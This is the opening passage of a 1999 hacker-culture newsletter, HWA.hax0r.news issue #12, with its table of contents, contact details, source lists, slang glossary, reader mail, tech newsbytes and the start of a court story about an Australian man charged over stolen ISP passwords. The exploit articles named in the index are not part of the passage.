
hwa-hn12

Published in HWA · 26 Apr 2019

    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 12 Volume 1 1999 April 1st 99
==========================================================================


** ISSUE 13 will be back to standard text format, htmlizing this file is too
much work and bloats up the issue too much, if anyone wants to convert the
texts to html though feel free to do so, and credit yourself for the work
done as it takes some time to get all the links and make sure demo html is
viewable in online versions..... - Ed



Note that some stuff may not display correctly as I did not fully convert
all the text contained in this file to html, it is recommended you read
this file in standard text mode...

=------------------------------------------------------------------------=

"If your hacker admits to having been wrong, don't demand an apology;
so far as the hacker is concerned, admitting to being wrong
is an apology,"


- from http://www.plethora.net/~seebs/faqs/hacker.html
see sideline, 'proper care and feeding of your hacker'

=------------------------------------------------------------------------=


Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>


@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #12

=-----------------------------------------------------------------------=


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #wierdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #12


=--------------------------------------------------------------------------=


[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the editor..................................................
03.0 .. Aussie faces 12months jail time .................................
04.0 .. Mitnick update, another year in jail?............................
04.1 .. The Bumper Sticker Stays.........................................
04.2 .. Mitnick's Judgment Day at Hand...................................
04.3 .. Why We Still Have to Free Kevin Mitnick..........................
04.4 .. Mitnick gets 46 months...........................................
05.0 .. Sesquipedalian.c 0 length connection resetting exploit...........
06.0 .. Yet more MSIE5 vulnerabilities...................................
07.0 .. QuickHacks and tips from ManicX..................................
08.0 .. NT4 index server 2.0 vulnerabilities.............................
09.0 .. Yahoo news ticker has plaintext passwords in config files........
10.0 .. Defacing websites? read this from bufferoverflow/attrition.......
11.0 .. Security analysis of Satellite command uplinks...................
12.0 .. Melissa Pr0n virus makes it hard for Microsoft users.............
12.1 .. The Melissa macro virus code.....................................
12.2 .. PAPA, a Melissa variant targets specific people with ping fluds..
12.3 .. PAPA B and the MadCow variants of Melissa already spreading......
12.4 .. April 1st Melissa virus creator apprehended......................
13.0 .. [ISN] A hacker's worst nightmare ................................
13.1 .. How bad is Pentium III privacy threat?...........................
14.0 .. ICQ99 Bug, erh feature turns your icq into a DoSable web server..
15.0 .. Russian crackers takeout whitehouse.gov?.........................
16.0 .. New Excel macro virus can bypass protections.....................
17.0 .. xfree86 SUSE exploit.............................................
18.0 .. Proper feeding and caring of your new hacker ....................
19.0 .. Unix wardialer from w00w00 security..............................
20.0 .. Australia gears up security for Olympics ........................
21.0 .. NetBSD security advisories: umapfs ..............................
21.1 .. NetBSD noexec mount flag advisory ...............................
22.0 .. Checkpoint releases new DHCP based user 'mapping' technology.....
23.0 .. SPAWAR a navy site for the security conscious...go FISH..........
24.0 .. A Portscan detector..............................................
25.0 .. Port 21 (FTP) Control port vulnerability scanner.................
26.0 .. WuFTPd scanner...................................................
27.0 .. The Wu-FTPd exploit and patch thread ............................
28.0 .. Another Wu-FTPd exploit (wh0a.c).................................
29.0 .. Netscape 4.51 allows url sniffing exploit and patch.............
30.0 .. X11R6 rewt compromise exploit....................................
31.0 .. Yet another wu-ftpd scanner by 03m0s1s...........................
32.0 .. RedHat Linux security vulnerabilities list from redhat...........
33.0 .. The Suburbanization of Slashdot by Pasty Drone...................
34.0 .. Canada Rolls into Fiscal 2000....................................
35.0 .. More exploits from the ADM crew .................................
=--------------------------------------------------------------------------=

Special Sections. Civil disobedience and hacktivism, hacking contests

=--------------------------------------------------------------------------=

SP.00 .. Intro: That Wild Wild Cyberfrontier..............................
SP.01 .. Article 1:"Electronic Civil Disobedience and.....................
...........................the World Wide Web of Hacktivism:"
....
SP.02 .. Article 2:"Digital Zapatismo"....................................
.................................................................
SP.C1 .. The Phallusi of cracking contests................................
SP.C2 .. Hacker challenges: Boon or Bane by Gene Spafford.................

=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
..........................................................................
HA.HA .. Humour and puzzles ............................................
HOW.TO .. New section: "How to hack" by our illustrious editor part 3.....
SITE.1 .. Featured site, .................................................
RAW.1 .. We remember Autonet'86..........................................
H.W .. Hacked Websites ..............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]


00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.


Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5'' disks, Zip disks, 5.25'' or 8'' floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA


00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance). Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux, no copyright claimed.

HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls (HNN)..................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD ..............................http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+........................http://www.gammaforce.org/
News site+........................http://www.projectgamma.com/


+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...

* Yes demoniz is now officially retired, if you go to that site though the
Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
also be hosting a webboard as soon as that site comes online perhaps you can
visit it and check us out if I can get some decent wwwboard code running I
don't really want to write my own, another alternative being considered is a
telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.


http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security

...


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without your
permission in any medium outside the distribution of this list may be
challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)


Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

ISSN 1004-042X

Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest


[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "subscribe isn".


@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black


Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondents please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.


N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA


00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal usage and use in this zine is
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavy equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
from the underground masses. also "w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-


01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra Pasty Drone
TwstdPair TheDuece _NeM_
D----Y RTFM99 Kevin Mitnick (watch yer back)
ypwitch kimmie vexxation
hunchback mack sAs72 Spikeman

and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)


kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
always popular..."

- FProphet '99


+++ When was the last time you backed up your important data?

++ Y2K: Qantas prepared to cancel flights

The Y2K problem has proven too much for Australian airline Qantas, which
has announced it may have to cancel flights. In a statement to the
Australian Stock Exchange (ASX), the airline said it may reduce the
number of flights on some domestic and international routes. "Qantas will
only fly if it is safe to do so," its report stated. Qantas said it had
checked with the manufacturers of its aircraft, which advised "that there
are no safety or airworthiness issues relating to the year 2000 compliance
of their aircraft". On this basis, the airline said it was satisfied that
its business was "unlikely to be significantly disrupted". However, Qantas
said services provided by "certain airports and air space authorities" were
not compliant, and for this reason contingency plans were being developed.


Want the full story? It's at
http://newswire.com.au/9903/qy2k.htm

++ School Net filter software bans Bible

A Net filtering system used by NSW state schools has been found to
inaccurately block certain Web sites, according to online civil
liberties group Electronic Frontiers Australia (EFA). Citing a recent report by
the US body Censorware Project, EFA said the SmartFilter product used by
schools had "problems". The report 'Censored Internet Access in Utah
Public Schools and Libraries' found SmartFilter blocked sites featuring all of
Shakespeare's plays, the Koran, the 'Adventures of Sherlock Holmes' and
a number of safe-sex and AIDS prevention sites, to name just a few. Danny
Yee of EFA said SmartFilter's claim that all blocked sites were checked by
people was false.


http://newswire.com.au/9903/netfilt.htm


++ AOL and Sun to ship in early 2000

AOL and Sun executives have revealed plans for their first jointly
developed products. The products, to be shipped early next year, will be
available for most major platforms including Linux and Windows NT, and
will be sold through a dedicated sales force of more than 500 people. AOL and
Sun have also announced they will continue to maintain support for their
existing software lines. Details are still unclear about how Sun and
AOL/Netscape will develop a multiplatform ecommerce solution, and what
form the product will take.


<a href="http://newswire.com.au/9903/aosun.htm">http://newswire.com.au/9903/aosun.htm</a>


++ AMAZON TO DO AUCTIONS (BUS. 7:40 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/18788.html

The book and music seller plans to take on eBay, OnSale....
Also: A green energy company goes online, announces IPO....
Disney's Blast rejoins the family.... China likes CDMA....
Covad extends DSL nationwide for small businesses.... And
ZiaSun says it will take Web-based email everywhere
and anywhere.


++ WHEN SECRECY STOPS SCIENCE (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18740.html

Yes, it's bad to share the recipe for a really big bomb. But
scientific secrecy can go too far. An MIT colloquium tries
to strike a balance. By Chris Oakes.


++ STATES SEEK OS SURRENDER (POL. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18781.html

Nineteen states that have accused Microsoft of antitrust
violations want to force the company to auction off its
Windows operating system. There's still no hint of what the
feds want.


Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yes we really do get a pile of mail in case you were wondering ;-0
here's a sampling of some of the mail we get here, the more interesting
ones are included and of course we had to get in the plugs for the
zine coz we love to receive those too *G* - Ed

Delivered-To: dok-cruciphux@dok.org
From: "liquid phire" <liquidphire@hotmail.com>
Subject: the unknown netizen
Date: Thu, 25 Mar 1999 15:15:34 PST


the unknown netizen


we are not all sinless, our ethics do not save us from damnation. we are
close to gods, but our divinity is tainted with blood. we are not
perfect and our mistakes do not go unnoticed.


but we are one.


it is not one cry that sends a shiver up the spine of every government
with something to hide, it is the shouts of a thousand warriors. it is
not a few that are imprisoned, it is us all that wear chains. it is not
one tear that is shed, it is an ocean of sorrow that drowns everything
in its wake.


we are of one mind and we never forget. we are of one body, intertwined
electricity, wires and chips. we have but one vision, a world in which
rights need not be fought for.


as one we fight.


as one we will see a new world.


as one we are the faceless, the names that will never be lost to time.


phiregod
liquidphire@hotmail.com
please excuse all errors in grammar/spelling.
Get Your Private, Free Email at http://www.hotmail.com


-=-

-=-

Delivered-To: dok-cruciphux@dok.org
From: "John Doe" <XXXXXXXXXXXXXXXXXX>
To: cruciphux@dok.org
Subject: Book
Date: Sat, 27 Mar 1999 05:46:08 PST
Mime-Version: 1.0
Content-type: text/plain


Dear Editor,


I am currently in the process of writing a book looking at the dawn of
hacking through to where it is now and on to the future. This book will
not be containing any comments designed to inflame the current public
perception of hackers, it has been designed to shatter the myths. To do
this though, I am in need of some help. I need people to point me in
the right direction. I shall also be entering comments from a few
hackers if they will let me.


One chapter in the book seems to have gotten the interest of a lot of
hackers. This chapter is about profiles of hackers. Basically, I write
out these profiles without their nicks, names or anything to identify
them and show what a 'typical hacker' is if there indeed is one.


If you could help me out by putting an article in your net magazine
requesting aid for me or by talking to other hackers that are more
'leet' than others so that I can get their opinions. So far, I have
spoken to very few people and their talents seem to be more in their
head than actually physically used.


Any help would be greatly appreciated.


Yours sincerely,


XXXXXXXXXXXX

Send responses to this to me directly for forwarding to the writer:
cruciphux@dok.org
Thank you.

================================================================

@HWA


02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("Read commented source!\n\n");

/*well i tried out an idea with html and it doesn't agree with me
*too much double text is created and its a damn load more work to
*put together an issue that is html and text readable so we'll be
*sticking to text for now.
*
*Perhaps someone will volunteer time to convert an issue or two to
*html or sometime in the future when I have more spare time I may
*be able to make html versions, meanwhile ... have fun ... - Cruci
*
*/

printf ("EoF.\n");
}


Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net; complaints and all nastygrams and
mailbombs can go to /dev/null; nukes, synfloods and papasmurfs to
127.0.0.1; private mail to cruciphux@dok.org

danke.

C*:.


@HWA

03.0 Aussie man faces 12 months in jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Perth 'passwords' man appears in court
Roulla Yiacoumi

A Perth man charged with 37 counts of unlawfully operating a
computer system has appeared in court.

Christopher Thomas Daniels, 20, did not enter a plea and
requested legal advice before his next appearance on April 13.

It was alleged Daniels had passwords to 350 Internet
accounts, but used just 37 to fraudulently gain $50 worth of
Net access (see story). It is believed he was given the account
details by a juvenile.

Users were not aware their accounts had been compromised;
the ISP noticed inconsistencies and contacted police.
Detective Senior Constable Mike Wheeler from the WA major
fraud squad said people gaining access to Net passwords was
a widespread problem, not limited to this particular ISP.

The accounts in this case were all with one ISP, Vianet in WA.
Vianet managing director Tony Broughton was not available for
comment this afternoon.

<previous related story>

22/03/99 15:51

Net fraud: Aussie man charged
Roulla Yiacoumi

A 20-year-old Perth man is facing 12 months in jail over Internet
